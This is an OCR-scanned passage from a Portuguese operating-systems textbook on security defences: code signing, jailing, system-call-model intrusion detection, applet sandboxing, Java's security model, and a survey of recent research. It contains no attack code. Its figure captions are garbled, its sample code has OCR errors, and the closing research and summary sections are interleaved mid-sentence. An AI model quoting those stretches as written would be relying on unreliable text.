Arquivos JPEG, por exemplo, não contêm programas, 
e desse modo não podem conter vírus. Todos os docu- 
mentos devem funcionar dessa maneira. 

Terceiro, deve haver uma maneira de proteger con- 
tra cilindros de disco escrita para evitar que vírus in- 
feccionem os programas neles. Essa proteção pode ser 
implementada tendo um mapa de bits dentro do con- 
trolador listando os cilindros protegidos contra escrita. 
O mapa deveria ser alterável somente quando o usuá- 
rio movesse uma chave mecânica no painel frontal do 
computador. 

Quarto, manter o BIOS na memória flash é uma boa 
ideia, mas ele só deve ser modificável quando uma cha- 
ve de externa for movida, algo que acontecerá somente 
quando o usuário estiver instalando uma atualização do 
BIOS. É claro, nada disso será levado a sério até que 
um vírus realmente potente atinja os equipamentos. Por 
exemplo, um vírus que atinja o mundo financeiro e re- 
configure todas as contas bancárias para 0. É claro, a 
essa altura será tarde demais. 


9.10.3 Assinatura de código 


Uma abordagem completamente diferente para man- 
ter um malware longe (lembre-se: defesa em profundi- 
dade) é executar somente softwares não modificados de 
vendedores de softwares confiáveis. Uma questão que 
aparece de maneira relativamente rápida é como o usu- 
ário pode saber se o software veio do vendedor que ele 
disse que veio, e como o usuário pode saber que ele não 
foi modificado desde que deixou a fábrica. Essa questão 
é especialmente importante quando baixando softwares 
de lojas on-line de reputação desconhecida ou quando 
baixando controles activeX de sites. Se o controle acti- 
veX veio de uma companhia de softwares bem conheci- 
da, é improvável que ele contenha um cavalo de Troia, 
por exemplo, mas como o usuário vai saber? 

Uma maneira que está sendo amplamente usada 
é a assinatura digital, como descrita na Seção 9.5.4. 
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Se o usuário executa somente programas, plug-ins, dri- 
vers controles activeX e outros tipos de softwares que 
foram escritos e assinados por fontes confiáveis, as 
chances de ter problemas são muito menores. A con- 
sequência de fazer isso, no entanto, é que o novíssimo 
Jogo gratuito tão bacana da Snarky Software é provavel- 
mente bom demais para ser verdade e não passará pelo 
teste de assinatura, já que você não sabe quem está por 
trás dele. 

A assinatura de código é baseada na criptografia de 
chave pública. Um vendedor de softwares gera um par 
(chave pública, chave privada), tornando a primeira 
chave pública e zelosamente guardando a segunda. A 
fim de assinar um fragmento de software, o vendedor 
primeiro calcula uma função de resumo (hash) do códi- 
go para conseguir um número de 160 bits ou 256 bits, 
dependendo se SHA-1 ou SHA-256 está sendo usado. 
Ele então assina o valor de resumo encriptando-o com 
sua chave privada (na realidade, decriptando-o usando 
a notação da Figura 9.15). Essa assinatura acompanha o 
software para toda parte que ele for. 

Quando o usuário recebe o software, a função de 
resumo é aplicada sobre ele e o resultado, salvo. Ele 
então decripta a assinatura que o acompanha usando a 
chave pública do vendedor e compara o que o vende- 
dor alega ser a função de resumo com o que acaba de 
processar. Se forem correspondentes, o código é aceito 
como genuíno. De outra maneira, ele é rejeitado como 
falso. A matemática envolvida torna extraordinaria- 
mente difícil para qualquer um alterar o software de 
tal maneira que sua função de resumo vá correspon- 
der à função de resumo obtida através da decriptação 
da assinatura genuína. É igualmente difícil gerar uma 
nova falsa assinatura que corresponda sem ter a chave 
privada. O processo de assinatura e verificação está 
ilustrado na Figura 9.35. 

Páginas da web podem conter código, como contro- 
les activeX, mas também códigos em várias línguas de 
scripts. Muitas vezes eles são assinados, caso em que 
o navegador automaticamente examina a assinatura. 
É claro, para verificá-la, o navegador precisa da cha- 
ve pública do vendedor do software, que normalmente 
acompanha o código juntamente com um certificado 
assinado por alguma autoridade certificadora garan- 
tindo a autenticidade da chave pública. Se o navega- 
dor tem a chave pública da autoridade certificadora já 
armazenada, ele pode verificar o certificado sozinho. 
Se o certificado for assinado por uma autoridade cer- 
tificadora desconhecida para o navegador, ele abrirá 
uma caixa de diálogo perguntando se deve aceitar o 
certificado ou não. 
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[FIGURA 9.35] Como assinatura de código funciona. 
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9.10.4 Encarceramento 


Diz um velho ditado russo: “Confie, mas verifique”. 
Claramente, o velho russo que disse isso pela primeira 
vez estava pensando em um software. Mesmo que um 
software tenha sido assinado, uma boa atitude é veri- 
ficar se ele está comportando-se corretamente, pois a 
assinatura meramente prova de onde ele veio, não o que 
ele faz. Uma técnica para fazer isso é chamada de en- 
carceramento (jailing) e está ilustrada na Figura 9.36. 

O programa recentemente adquirido é executado 
como um processo rotulado “prisioneiro” na figura. 
O “carcereiro” é um processo (sistema) confiável que 
monitora o comportamento do prisioneiro. Quando um 
processo encarcerado faz uma chamada de sistema, em 
vez de a chamada de sistema ser executada, o controle é 
transferido para o carcereiro (através de um chaveamento 
de núcleo) e o número de chamada do sistema e parâ- 
metros passados para ele. O carcereiro então toma uma 
decisão sobre se a chamada de sistema deve ser permiti- 
da. Se o processo encarcerado tentar abrir uma conexão 
de rede para um hospedeiro remoto desconhecido para o 
carcereiro, por exemplo, a chamada pode ser recusada e o 
prisioneiro morto. Se a chamada de sistema for aceitável, 
o carcereiro apenas informa o núcleo, que então a leva 
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H1 = resumo (Programa) 
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Aceita o programa se H1 = H2 


adiante. Dessa maneira, comportamentos equivocados 
podem ser pegos antes que causem problemas. 

Existem várias implementações do encarceramento. 
Uma que funciona em quase qualquer sistema UNIX, 
sem modificar o núcleo, é descrita por Van’t Noordende 
et al. (2007). Resumindo, o esquema usa as ferramentas 
de depuração UNIX normais, em que o carcereiro é o 
depurador e o prisioneiro o depurado. Nessas circuns- 
tâncias, o depurador pode instruir o núcleo para encap- 
sular o depurado e passar todas as suas chamadas de 
sistema para ele para inspeção. 


9.10.5 Detecção de intrusão baseada em modelo 


Outra abordagem ainda para defender uma máquina 
é instalar um IDS (Intrusion Detection System — Sis- 
tema de detecção de intrusão). Há dois tipos básicos de 
IDSs, um focado em inspecionar pacotes de rede que 
chegam e outro que procura por anomalias na CPU. 
Mencionamos brevemente o IDS de rede no contexto 
de firewalls anteriormente; agora diremos algumas pa- 
lavras sobre IDS baseado no hospedeiro. Limitações 
de espaço impedem que abordemos os muitos tipos 
de IDSs baseados em hospedeiros. Em vez disso, va- 
mos examinar brevemente um tipo para dar uma ideia 
de como eles funcionam. Esse é chamado de detecção 
de intrusão baseada em modelo estático (HUA et al., 
2009). Ela pode ser implementada usando a técnica de 
encarceramento discutida antes, entre outras maneiras. 

Na Figura 9.37(a) vemos um pequeno programa 
que abre um arquivo chamado data e lê um caractere 
de cada vez até atingir um byte zero, momento em que 
ele imprime o número de bytes não zero no início do 
arquivo e sai. Na Figura 9.37(b) vemos um gráfico de 
chamadas de sistema feitas por esse programa (em que 
print chama write). 


a lele)sy:Weeeyd) (a) Um programa. (b) Gráfico de chamadas de 
sistema para (a). 
int main(int argc «char argv[]) 


int fd, n = 0; 
char buf[1]; 


fd = open("data", 0); 
if (fd < 0) { 
printf("Arquivo de dados 
invalido\n"); 
exit(1); 
yelse { 
while (1) { 
read(fd, buf, 1); 
if (buf[O] == 0) { 
close(fd); 
printf("n = %d\n", n); 
exit(0); 
} 
n=n+1; 
} 
} 
} 


(a) (b) 


O que esse grafico nos conta? Em primeiro lugar, a 
primeira chamada de sistema que o programa faz, sob 
todas as condições, é sempre open. A seguinte é read ou 
write, dependendo de qual ramo da declaração if é toma- 
do. Se a segunda chamada for write, isso significa que o 
arquivo não pode ser aberto e a próxima chamada deve 
ser exit. Se a segunda chamada for read, pode haver um 
número arbitrariamente grande de chamadas adicionais 
para read e eventualmente chamadas para close, write 
e exit. Na ausência de um intruso, nenhuma outra se- 
quência é possível. Se o programa for encarcerado, o 
carcereiro verá todas as chamadas de sistema e poderá 
facilmente verificar que a sequência é válida. 

Agora suponha que alguém encontre um defeito nes- 
se programa e consiga desencadear um transbordamento 
de buffer e insira e execute um código hostil. Quando 
o código hostil executar, ele muito provavelmente exe- 
cutará uma sequência diferente de chamadas de sistema. 
Por exemplo, ele pode tentar abrir algum arquivo que ele 
quer copiar ou pode abrir uma conexão de rede para ligar 
para casa. Na primeiríssima chamada de sistema que não 
se encaixar no padrão, o carcereiro saberá definitivamen- 
te que houve um ataque e poderá tomar medidas, como 
derrubar o processo e alertar o administrador do sistema. 
Dessa maneira, sistemas de detecção de intrusão podem 
detectar ataques enquanto eles estão acontecendo. A aná- 
lise estática das chamadas de sistema é apenas uma de 
muitas maneiras que um IDS pode funcionar. 

Quando esse tipo de intrusão baseada em modelo es- 
tático é usado, o carcereiro tem de conhecer o modelo 
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(isto é, o gráfico de chamada do sistema). A maneira 
mais direta para ele aprender é fazer com que o com- 
pilador o gere e o autor do programa o assine e anexe 
o seu certificado. Dessa maneira, qualquer tentativa de 
modificar o programa executável antecipadamente será 
detectada quando ele for executado, pois o comporta- 
mento real não será compatível com o comportamento 
esperado assinado. 

Infelizmente, é possível para um atacante inteligente 
lançar o que é chamado de um ataque por mimetismo, 
no qual o código inserido faz as mesmas chamadas de 
sistema que o programa deve fazer, então são necessá- 
rios modelos mais sofisticados do que apenas rastrear as 
chamadas de sistema. Ainda assim, como parte da de- 
fesa em profundidade, um IDS pode exercer um papel. 

Um IDS baseado em modelo não é o único tipo, de 
maneira alguma. Muitos IDSs fazem uso de um conceito 
chamado chamariz (honeypot), uma armadilha coloca- 
da para atrair e pegar crackers e malwares. Normalmente, 
trata-se de uma máquina isolada com poucas defesas e 
um conteúdo aparentemente interessante e valioso, pron- 
to para ser colhido. As pessoas que colocam o chamariz 
monitoram cuidadosamente quaisquer ataques nele para 
tentar aprender mais sobre a natureza do ataque. Alguns 
IDSs colocam seus chamarizes em máquinas virtuais 
para evitar danos para o sistema real subjacente. Então, 
naturalmente, o malware tenta determinar se ele está exe- 
cutando em uma máquina virtual, como já discutido. 


9.10.6 Encapsulamento de código móvel 


Vírus e vermes são programas que entram em um 
computador sem o conhecimento do proprietário e con- 
tra a vontade dele. Às vezes, no entanto, as pessoas mais 
ou menos intencionalmente importam e executam um 
código externo em suas máquinas. Acontece normal- 
mente dessa forma. No passado distante (que, no mundo 
da internet, significa alguns anos atrás), a maioria das 
páginas na web era apenas arquivos HTML com algu- 
mas imagens associadas. Hoje em dia, cada vez mais 
muitas páginas na web contêm pequenos programas 
chamados applets. Quando uma página na web conten- 
do applets é baixada, os applets são buscados e executa- 
dos. Por exemplo, um applet pode conter um formulário 
a ser preenchido, mais ajuda interativa para preenchê- 
-lo. Quando o formulário estiver preenchido, ele pode 
ser enviado para alguma parte na internet para ser pro- 
cessado. Formulários de imposto de renda, formulários 
de pedidos de produtos customizados e muitas outras 
formas poderiam beneficiar-se dessa abordagem. 
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Outro exemplo no qual programas são mandados de 
uma máquina para outra para execução na máquina de 
destino são agentes. Esses são programas lançados por 
um usuário para realizar alguma tarefa e então reportar 
de volta. Por exemplo, poderia ser pedido a um agente 
para conferir alguns sites de viagem e encontrar o voo 
mais barato de Amsterdã a São Francisco. Ao chegar a 
cada local, o agente executaria ali, conseguiria a infor- 
mação de que ele precisava, então seguiria para o pró- 
ximo site. Quando tudo tivesse terminado, ele poderia 
voltar para casa e relatar o que havia aprendido. 

Um terceiro exemplo de código móvel é o arquivo 
PostScript que deve ser impresso em uma impressora 
PostScript. Um arquivo PostScritpt é na realidade um 
programa na linguagem de programação PostScript que 
é executado dentro da impressora. Ele normalmente diz à 
impressora para traçar determinadas curvas e então preen- 
chê-las, mas pode fazer qualquer coisa que lhe dê vontade 
também. Applets agentes e arquivos PostScript são ape- 
nas três exemplos de código móvel, mas há muitos mais. 

Dada a longa discussão a respeito de vírus e ver- 
mes anteriormente, deve ficar claro que permitir que 
um código externo execute em sua máquina é mais do 
que um pouco arriscado. Mesmo assim, algumas pes- 
soas querem executar esses programas externos, então 
surge a questão: “O código móvel pode ser executado 
seguramente?” A resposta curta é: “Sim, mas não fa- 
cilmente”. O problema fundamental é que, quando um 
processo importa um applet ou outro código móvel para 
seu espaço de endereçamento e o executa, esse código 
está executando como parte de um processo do usuário 
válido e tem todo o poder que o usuário tem, incluindo 
a capacidade de ler, escrever, apagar ou criptografar os 
arquivos de disco do usuário, enviar por e-mail dados 
para países distantes e muito mais. 

Não faz muito tempo, sistemas operacionais desen- 
volveram o conceito de processo para construir barreiras 
entre os usuários. A ideia é que cada processo tenha seu 
próprio endereço protegido e sua própria UID, permi- 
tindo-lhe tocar arquivos e outros recursos pertencentes 
a ele, mas não a outros usuários. Para fornecer proteção 
contra uma parte do processo (o applet) e o resto, o con- 
ceito de processo não ajuda. Threads permitem múlti- 
plos threads de controle dentro de um processo, nas não 
fazem nada para proteger um thread do outro. 

Na teoria, executar um applet como um processo 
em separado ajuda um pouco, mas muitas vezes é algo 
impraticável. Por exemplo, uma página da web pode 
conter dois ou mais applets que interagem uns com os 
outros e com os dados na página da web. O navegador 
da web também pode precisar interagir com os applets, 
inicializando-os e parando-os, alimentando dados para 


eles, e assim por diante. Se cada applet for colocado em 
seu próprio processo, o mecanismo como um todo não 
funcionará. Além disso, colocar um applet no seu pró- 
prio espaço de endereçamento não dificulta nem mais 
um pouco para o applet roubar ou danificar dados. No 
mínimo, seria mais fácil, pois ninguém poderia ver. 

Vários novos métodos para lidar com applets (e có- 
digos móveis em geral) foram propostos e implementa- 
dos. A seguir examinaremos dois desses métodos: caixa 
de areia e interpretação. Além disso, a assinatura de có- 
digo também pode ser usada para verificar a fonte do 
applet. Cada um tem seus pontos fortes e fracos. 


Caixa de areia 


O primeiro método, chamado caixa de areia (sand- 
boxing), confina cada applet a uma faixa limitada de 
endereços virtuais implementados em tempo de execu- 
ção (WAHBE et al., 1993). Ele funciona primeiro divi- 
dindo o espaço de endereçamento virtual em regiões de 
tamanhos iguais, que chamaremos de caixas de areia. 
Cada caixa de areia deve ter a propriedade de que todos 
os seus endereços compartilhem alguma cadeia de bits 
de alta ordem. Para um espaço de endereçamento de 32 
bits, poderíamos dividi-lo em 256 caixas de areia em 
limites de 16 MB de maneira que todos os endereços 
dentro de uma caixa de areia tenham um limite superior 
(upper) comum de 8 bits. De maneira igualmente satis- 
fatória, poderíamos ter 512 caixas de areia em limites 
de 8 MB, com cada caixa de areia tendo um prefixo de 
endereço de 9 bits. O tamanho da caixa de areia deve 
ser escolhido para ser grande o suficiente para conter o 
maior applet sem desperdiçar demais o espaço de ende- 
reçamento virtual. A memória física não é uma questão 
se a paginação sob demanda estiver presente, como nor- 
malmente está. Cada applet recebe duas caixas de areia, 
uma para o código e outra para os dados, como ilustrado 
na Figura 9.38(a) para o caso de 16 caixas de areia de 
16 MB cada. 

A ideia básica por trás de uma caixa de areia é garan- 
tir que um applet não possa saltar para um código fora 
da sua caixa de areia de código ou dado de referência 
fora da sua caixa de areia de dados. A razão para ter 
duas caixas de areia é evitar que um applet modifique 
o seu código durante a execução para driblar essas res- 
trições. Ao evitar todas as escritas na caixa de areia de 
código, eliminamos o perigo do código que modifica a 
si mesmo. Enquanto um applet estiver confinado dessa 
maneira, ele não poderá danificar o navegador ou outros 
applets, plantar vírus na memória ou de outra maneira 
provocar qualquer dano à memória. 


le Wekt:d (a) Memória dividida em caixas de areia de 16 MB. 
(b) Uma maneira de verificar a validade de uma 
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Tão logo o applet é carregado, ele é realocado para 
começar no início da sua caixa de areia. Então são fei- 
tas verificações para ver se as referências de código 
e dados estão confinadas à caixa de areia apropriada. 
Na discussão a seguir, examinaremos apenas as re- 
ferências de código (isto é, instruções JMP e CALL), 
mas a mesma história se mantém para as referências 
de dados também. Instruções JMP estáticas que usam 
endereçamento direto são fáceis de conferir: o ende- 
reço alvo cai dentro dos limites da caixa de areia de 
código? De modo similar, JMPs relativos são também 
fáceis de conferir. Se o applet tem um código que tenta 
deixar a caixa de areia de código, ele é rejeitado e não 
é executado. Similarmente, tentativas de tocar dados 
fora da caixa de areia de dados fazem com que o applet 
seja rejeitado. 

A parte difícil são as instruções dinâmicas JMP. A 
maioria das máquinas tem uma instrução na qual o en- 
dereço para saltar é calculado no momento da execu- 
ção, colocado em um registrador e então saltado para 
lá indiretamente; por exemplo, o JMP (R1) saltar para 
o endereço contido no registrador 1. A validade dessas 
instruções deve ser conferida no momento da execução. 
Isso é feito inserindo o código diretamente antes do salto 
indireto para testar o endereço alvo. Um exemplo desse 
tipo de teste é mostrado na Figura 9.38(b). Lembre-se 
de que todos os endereços válidos têm os mesmos bits 
k mais significativos, então esse prefixo pode ser arma- 
zenado em um registrador auxiliar S2. Esse registrador 
não pode ser usado pelo próprio applet, que pode exigir 
reescrevê-lo para evitar esse registro. 
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O código funciona como a seguir: primeiro o endere- 
ço alvo sendo inspecionado é copiado para um registra- 
dor auxiliar, S1. Então esse registrador é deslocado para 
a direita precisamente o número correto de bits para 
isolar o prefixo comum em S1. Em seguida, o prefi- 
xo isolado é comparado ao prefixo correto inicialmente 
carregado em S2. Se eles não casam, ocorre um desvio 
e o applet é eliminado. Essa sequência de código exige 
quatro instruções e dois registradores auxiliares. 

Modificar um programa binário durante a execução 
exige algum trabalho, mas é possível de ser feito. Se- 
ria mais simples se o applet fosse apresentado em for- 
ma de fonte e então compilado localmente usando um 
compilador confiável que automaticamente conferiu os 
endereços estáticos e inseriu um código para verificar 
os dinâmicos durante a execução. De qualquer maneira, 
há alguma sobrecarga de tempo de execução associada 
com verificações dinâmicas. Wahbe et al. (1993) men- 
surou isso como aproximadamente 4%, o que geralmen- 
te é aceitável. 

Um segundo problema que deve ser solucionado é 
o que acontece quando um applet tenta fazer uma cha- 
mada de sistema. A solução aqui é direta. A instrução 
de chamada de sistema é substituída por uma chama- 
da para um módulo especial chamado de monitor de 
referência na mesma passagem que as verificações 
de endereços dinâmicos são inseridas (ou, se o código 
fonte estiver disponível, conectando com uma bibliote- 
ca especial que chama o monitor de referência em vez 
de fazer chamadas do sistema). De qualquer maneira, o 
monitor de referência examina cada chamada tentada 
e decide se é seguro desempenhá-la. Se a chamada for 
considerada aceitável, como escrever um arquivo tem- 
porário em um diretório auxiliar designado, ela pode 
prosseguir. Se a chamada for conhecida por ser perigosa 
ou o monitor de referência não puder dizer, o applet é 
eliminado. Se o monitor de referência puder dizer qual 
applet o chamou, um único monitor de referência em 
algum lugar na memória pode lidar com as solicitações 
de todos os applets. O monitor de referência normal- 
mente fica sabendo das permissões de um arquivo de 
configuração. 


Interpretação 


A segunda maneira para executar applets não confi- 
áveis é executá-los interpretativamente e não deixá-los 
assumir o controle real do hardware. Essa é a aborda- 
gem usada pelos navegadores na web. Applets de pági- 
nas da web comumente são escritos em Java, que é uma 
linguagem de programação normal, ou em linguagem 
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de script de alto nível como o TCL seguro ou Java- 
script. Applets Java primeiro são compilados para uma 
linguagem de máquina orientada para pilha chamada 
JVM (Java Virtual Machine — Máquina virtual de 
Java). São esses applets JVM que são colocados na pá- 
gina da web. Quando baixados, eles são inseridos no 
interpretador JVM dentro do navegador como ilustrado 
na Figura 9.39. 

A vantagem de se executar um código interpretado 
sobre um código compilado é que cada instrução é exa- 
minada pelo interpretador antes de ser executada. Isso 
dá ao interpretador a oportunidade de conferir se o en- 
dereço é válido. Além disso, chamadas de sistema são 
também pegas e interpretadas. Como essas chamadas 
são tratadas é uma questão de política de segurança. Por 
exemplo, se um applet é confiável (por exemplo, veio 
de um disco local), suas chamadas de sistema poderiam 
ser levadas adiante sem questionamento algum. No en- 
tanto, se um applet não é confiável (por exemplo, veio 
através da internet), ele poderia ser colocado no que é 
efetivamente uma caixa de areia para restringir o seu 
comportamento. 

Linguagens de script de alto nível também podem 
ser interpretadas. Aqui nenhum endereço de máquina é 
usado, de maneira que não há perigo de um script tentar 
acessar a memória de uma maneira que não seja permis- 
sível. O lado negativo da interpretação em geral é que 
ela é muito lenta em comparação com a execução do 
código compilado nativo. 


aCe) y-Weei Applets podem ser interpretados por um 
navegador da web. 
Espaço de 
endereçamento virtual 
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9.10.7 Segurança em Java 


A linguagem de programação em Java e o sistema 
de execução (run-time system) que a acompanha foram 
projetados para permitir que um programa seja escri- 
to e compilado uma vez e então enviado pela internet 
em forma binária e executado em qualquer máquina 


que suporte Java. A segurança fez parte do projeto Java 
desde o início. Nesta seção descreveremos com ela 
funciona. 

Java é uma linguagem tipificada e segura, no sentido 
de que o compilador rejeitará qualquer tentativa de usar 
uma variável em uma maneira que não seja compatível 
com seu tipo. Em comparação, considere o código C a 
seguir: 

naughty_func( ) 


{ 


char *p; 
p =rand( ); 
*p=0; 

} 


Ele gera um numero aleatório e o armazena no pon- 
teiro p. Então ele armazena um byte 0 no endereço con- 
tido em p, sobrescrevendo o que quer que esteja ali, 
código ou dado. Em Java, construções que misturam 
tipos como esse são proibidas pela gramática. Além 
disso, Java não tem variáveis de ponteiro, arranjos ou 
alocação de armazenamento controlado pelo usuário 
(como malloc e free), e todas as referências de arranjos 
são conferidas no momento da execução. 

Programas de Java são compilados para um códi- 
go binário intermediário chamado byte code de JVM 
(Java Virtual Machine — Máquina Virtual de Java). 
A JVM tem aproximadamente 100 instruções, a maioria 
delas empurra objetos de um tipo específico para a pi- 
lha, tira-os da pilha, ou combina dois itens na pilha arit- 
meticamente. Esses programas de JVM são tipicamente 
interpretados, embora em alguns casos eles possam ser 
compilados em linguagem de máquina para uma exe- 
cução mais rápida. No modelo Java, applets enviados 
através da internet são em JVM. 

Quando um applet chega, ele é executado através de 
um verificador de byte code de JVM que confere se o 
applet obedece a determinadas regras. Um applet ade- 
quadamente compilado lhes obedecerá automaticamen- 
te, mas não há nada que impeça um usuário malicioso 
de escrever um applet JVM em linguagem de monta- 
gem JVM. As verificações incluem 


1. O applet tenta forjar ponteiros? 

2. Ele viola restrições de acesso sobre membros da 
classe privada? 

3. Ele tenta usar uma variável de um tipo como ou- 
tro tipo? 

4. Ele gera transbordamentos (overflows) de pilha 
ou o contrário (underflows)? 


5. Ele converte ilegalmente variáveis de um tipo 
para outro? 


Se o applet passa por todos os testes, ele pode ser 
seguramente executado sem medo de que ele vá acessar 
outra memória que não seja a sua. 

No entanto, applets ainda podem fazer chamadas 
de sistema chamando métodos Java (rotinas) forneci- 
das para esse fim. A maneira como Java lida com isso 
evoluiu com o passar do tempo. Na primeira versão do 
Java, JDK (Java Development Kit — Kit de Desen- 
volvimento Java) 1.0, applets eram divididos em duas 
classes: confiáveis e não confiáveis. Applets buscados 
do disco local eram confiáveis e deixados fazer quais- 
quer chamadas de sistema que quisessem. Em compara- 
ção, applets buscados na internet não eram confiáveis. 
Eles eram executados em uma caixa de areia, como 
mostrado na Figura 9.39, sem permissão para fazer pra- 
ticamente nada. 

Após alguma experiência com esse modelo, a Sun 
decidiu que ele era restritivo demais. No JDK 1.1, foi 
empregada a assinatura de código. Quando um applet 
chegava pela internet, era feita uma verificação para ver 
se ele fora assinado pela pessoa ou organização em que 
o usuário confiava (como definido pela lista de signa- 
tários confiáveis). Se afirmativo, ao applet era deixado 
fazer o que quisesse. Se negativo, ele era executado em 
uma caixa de areia e severamente restrito. 

Após mais experiências, isso provou-se insatisfató- 
rio também, então o modelo de segurança foi modifi- 
cado novamente. JDK 1.2 introduziu uma política de 
segurança de granularidade fina que se aplica a todos 
os applets, tanto locais quanto remotos. O modelo de 
segurança é complicado o suficiente para que um livro 
inteiro seja escrito descrevendo-o (GONG, 1999), en- 
tão resumiremos apenas brevemente alguns dos pontos 
mais importantes. 

Cada applet é caracterizado por duas coisas: de onde 
ele veio e quem o assinou. De onde ele veio é a sua 
URL; quem o assinou é qual chave privada foi usada 
para a assinatura. Cada usuário pode criar uma política 
de segurança consistindo em uma lista de regras. Cada 
regra pode listar uma URL, um signatário, um objeto e 
uma ação que o applet pode desempenhar sobre o objeto 
se a URL do applet e o signatário casam com a regra. 
Conceitualmente, a informação fornecida é mostrada 
na tabela da Figura 9.40, embora a formatação real seja 
diferente e relacionada à hierarquia de classe do Java. 

Um tipo de ação permite o acesso a arquivos. A ação 
pode especificar um arquivo ou diretório específicos, o 
conjunto de todos os arquivos em um determinado di- 
retório, ou o conjunto de todos os arquivos e diretórios 
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recursivamente contidos em um determinado diretório. 
As três linhas da Figura 9.40 correspondem a esses três 
casos. Na primeira linha, a usuária, Susan, configurou 
seu arquivo de permissões de maneira que os applets 
originados em sua máquina de preparo de impostos, que 
é chamada <www.taxprep.com>, e assinada pela empre- 
sa, tenha acesso de leitura aos seus dados tributários lo- 
calizados no arquivo 1040.xls. Esse é o único arquivo 
que eles podem ler e nenhum outro applet pode lê-lo. 
Além disso, todos os applets de todas as fontes, sejam 
assinados ou não, podem ler e escrever arquivos em 
/usr/tmp. 

Além disso, Susan também confia o suficiente na 
Microsoft para permitir que os applets originando em 
seu site e assinados pela Microsoft para ler, escrever e 
apagar todos os arquivos abaixo do diretório do Office 
na árvore do diretório, por exemplo, consertem defei- 
tos e instalem novas versões do software. Para verifi- 
car as assinaturas Susan deve ou ter as chaves públicas 
necessárias no seu disco ou adquiri-las dinamicamen- 
te, por exemplo, na forma de um certificado assinado 
por uma empresa em que ela confia e cuja chave pú- 
blica ela tem. 

Arquivos não são os únicos recursos que podem ser 
protegidos. O acesso à rede também pode ser protegi- 
do. Os objetos aqui são portas específicas em compu- 
tadores específicos. Um computador é especificado por 
um endereço de IP ou nome de DNS; portas naquela 
máquina são especificadas por uma gama de números. 
As ações possíveis incluem pedir para conectar-se ao 
computador remoto e aceitar conexões originadas por 
ele. Dessa maneira, um applet pode receber acesso à 
rede, mas restrito a conversar somente com computa- 
dores explicitamente nomeados na lista de permissões. 
Applets podem carregar dinamicamente códigos adicio- 
nais (classes) conforme a necessidade, mas carregado- 
res de classe fornecidos pelo usuário podem controlar 
precisamente em quais máquinas essas classes podem 
originar-se. Uma série de outras características de segu- 
rança também está presente. 


KETE Alguns exemplos de proteção que podem ser 
especificados com o JDK 1.2 























URL Signatário Objeto Ação 
www.taxprep.com |TaxPrep |/ust/ Read 
susan/1040.xIs 
é /usr/tmp/* Read, Write 
www.microsoft.com | Microsoft | /usr/ Read, Write, 
susan/Office/- | Delete 
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9.11 Pesquisa sobre segurança 


A segurança de computadores é um tópico de ex- 
tremo interesse. Pesquisas estão ocorrendo em todas as 
áreas: criptografia, ataques, malware, defesas, compi- 
ladores etc. Um fluxo mais ou menos contínuo de in- 
cidentes de segurança de grande repercussão assegura 
que o interesse de pesquisa em segurança, tanto na aca- 
demia quanto na indústria, não vá deixar de existir nos 
próximos anos. 

Um tópico importante é a proteção de programas 
binários. A Integridade de Fluxo de Controle (CFI — 
Control Flow Integrity) é uma técnica relativamente 
antiga para parar todos os desvios de fluxo de contro- 
le e, assim, todas as explorações ROP. Infelizmente, a 
sobrecarga é muito alta. Como ASLR, DEP e canários 
não estão sendo suficientes, muitos trabalhos recentes 
foram devotados a tornar o CFI prático. Por exemplo, 
Zhang e Sekar (2013), na Stony Brook, desenvolve- 
ram uma implementação eficiente do CFI para binários 
Linux. Um grupo diferente projetou uma implementa- 
ção diferente e ainda mais poderosa para o Windows 
(ZHANG, 2013b). Outra pesquisa tentou detectar trans- 
bordamentos de buffer mais cedo ainda, no momento 
do transbordamento em vez de na tentativa de desvio de 
fluxo de controle (SLOWINSKA et al., 2012). Detectar 
o transbordamento em si tem uma grande vantagem. Di- 
ferentemente das outras abordagens, ele permite que o 
sistema detecte ataques que modificam dados não rela- 
tivos ao controle também. Outras ferramentas fornecem 
proteções similares no momento da compilação. Um 
exemplo popular é o AddressSanitizer (SEREBRYANY, 
2013) da Google. Se qualquer uma dessas técnicas tor- 
nar-se amplamente empregada, teremos de acrescentar 


9.12 Resumo 


Computadores com frequência contêm dados valio- 
sos e confidenciais, incluindo declarações de impostos, 
números de cartões de crédito, planos de negócios, se- 
gredos de comércio e muito mais. Os proprietários des- 
ses computadores normalmente são muito zelosos em 
mantê-los privados e não violados, o que rapidamente 
leva à exigência de que os sistemas operacionais te- 
nham de proporcionar uma boa segurança. Em geral, a 
segurança de um sistema é inversamente proporcional 
ao tamanho da base computacional confiável. 

Um componente fundamental da segurança para sis- 
temas operacionais diz respeito ao controle de acesso 
aos recursos. Direitos ao acesso a informações podem 


outro parágrafo à corrida evolutiva descrita na seção de 
transbordamento de buffer. 

Um dos tópicos em alta na criptografia hoje em dia 
é a criptografia homomórfica. Em termos leigos: a crip- 
tografia homomórfica permite que você processe (adi- 
cione, subtraia etc.) dados criptografados enquanto eles 
estão encriptados. Em outras palavras os dados jamais 
são convertidos para o texto puro. Um estudo sobre os 
limites que podem ser provados da segurança para crip- 
tografia homomórfica foi conduzido por Bogdanov e 
Lee (2013). 

Capacidades e controle de acesso ainda são áreas de 
pesquisa muito ativas. Um bom exemplo das capacida- 
des suportando micronúcleos é o núcleo seL4 (KLEIN 
etal., 2009). Incidentalmente, esse também é um núcleo 
totalmente verificado que fornece segurança adicional. 
Capacidades tornaram-se um filão quente em UNIX 
também. Robert Watson et al. (2013) implementaram 
capacidades de peso leve para FreeBSD. 

Por fim, há muitos trabalhos sobre técnicas de explo- 
ração e malware. Por exemplo, Hund et al. (2013) mos- 
tram um ataque prático na temporização de canal para 
derrotar a randomização de espaço de endereçamento 
no núcleo do Windows. De maneira semelhante, Snow 
et al. (2013) mostram que a randomização de espaço de 
endereçamento JavaScript no navegador não ajuda en- 
quanto o atacante encontrar uma liberação de memória 
que vaze mesmo uma única maquineta. Em relação ao 
malware, um estudo recente por Rossow et al. (2013) 
analisa uma tendência alarmante na resiliência de bot- 
nets. Parece que especialmente botnets baseados em 
comunicação peer-to-peer serão terrivelmente difíceis 
de desmontar no futuro. Alguns desses botnets têm sido 
operacionais, sem interrupção, por mais de cinco anos. 


ser modelados como uma grande matriz, com as linhas 
sendo os domínios (usuários) e as colunas sendo os ob- 
jetos (por exemplo, arquivos). Cada célula especifica os 
direitos de acesso do domínio para o objeto. Tendo em 
vista que a matriz é esparsa, ela pode ser armazenada 
por linha, que se torna uma lista de capacidade dizendo 
o que o domínio pode fazer, ou por coluna, caso em 
que ela torna-se uma lista de controle de acesso dizendo 
quem pode acessar o objeto e como. Usando as técnicas 
de modelagem formais, o fluxo de informação em um 
sistema pode ser modelado e limitado. No entanto, às 
vezes ele ainda pode vazar canais ocultos, como modu- 
lar o uso da CPU. 


